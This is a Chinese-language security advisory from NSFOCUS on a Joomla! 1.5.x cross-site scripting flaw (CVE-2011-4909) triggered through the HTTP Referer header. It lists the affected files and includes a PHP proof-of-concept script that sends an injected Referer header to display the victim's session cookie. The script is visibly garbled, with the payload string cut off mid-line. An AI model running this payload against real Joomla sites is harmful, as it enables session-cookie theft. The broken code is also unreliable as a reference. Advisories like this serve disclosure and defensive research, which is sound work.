安全研究

安全漏洞
Joomla!跨站脚本执行漏洞(CVE-2011-4909)

发布日期:2012-10-07
更新日期:2012-10-08

受影响系统:
Joomla! Joomla! < 1.5.12
描述:
CVE ID: CVE-2011-4909

Joomla!是一款开放源码的内容管理系统(CMS)。

Joomla! 1.5.12之前版本存在多个XSS漏洞,可允许远程攻击者通过向components/com_content/views/article/tmpl/form.php、components/com_user/controller.php、plugins/system/legacy/html.php、templates/beez/html/com_content/article/form.php发送HTTP_REFERER标头注入任意Web脚本或HTML。

<*来源:Juan Galiana Lara (jgaliana@isecauditors.com
        Paul Boekholt
  
  链接:http://secunia.com/advisories/35668
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/* PoC: XSS Joomla 1.5.11 Juan Galiana Lara Internet Security Auditors Jun 2009 */ /* config */ $site='localhost'; $path='/joomla-1.5.11'; $cookname='d85558a8cf943386aaa374896bfd3d99'; $cookvalue='4ab56fdd83bcad86289726aead602699'; class cURL { var $headers; var $user_agent; var $compression; var $cookie_file; var $proxy; /* evil script */ var $xss='alert("PWN PWN PWN: " + document.cookie);'; function cURL($cookies=TRUE,$cookie='cookies.txt',$compression='gzip',$proxy='') { $this->headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'; $this->headers[] = 'Connection: Keep-Alive'; $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8'; $this->headers[] = 'Referer: ">get('http://' . $site . $path . '/index.php?option=com_content&view=article&layout=form'); /* let's execute some javascript.. }:-)*/ echo $c; ?>

建议:
厂商补丁:

Joomla!
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.joomla.org/

浏览次数:2537
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客